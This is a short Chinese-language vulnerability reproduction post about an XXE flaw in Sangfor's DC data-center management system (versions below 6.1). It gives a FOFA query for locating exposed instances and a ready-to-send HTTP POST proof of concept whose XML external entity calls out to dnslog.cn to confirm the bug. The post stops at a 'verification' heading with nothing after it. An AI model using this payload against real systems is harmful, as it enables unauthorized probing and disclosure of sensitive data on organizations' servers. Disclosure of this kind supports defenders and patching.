漏洞复现-深信服DC数据中心管理系统 XXE漏洞

0x01产品简介

　　深信服是数据中心管理系统是DC为AC饿外置数据中心，主要用于海量日志数据的异地扩展备份管理，多条件的组合的高效查询，统计和趋势报表生成，设备运行状态监控等功能。

0x02漏洞概述

　　深信服是数据中心管理系统DC存在xml外部实体注入漏洞。由于后端对传入的xml对象进行了非预期内解析，攻击者可以利用该漏洞进行xml注入攻击，获取系统敏感信息。

0x03影响范围

　　v6.1版本以下

0x04漏洞复现

　　FOFA："SANGFOR数据中心"

 

POC:

1 2 3 4 5 6 7 8 9 10 11

POST /src/sangforindex HTTP/1.1 Host: {{hostname}} Content-Type: text/xml   <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE root [     <!ENTITY rootas SYSTEM "http://dnslog.cn"> ]> <xxx> &rootas; </xxx>

验证：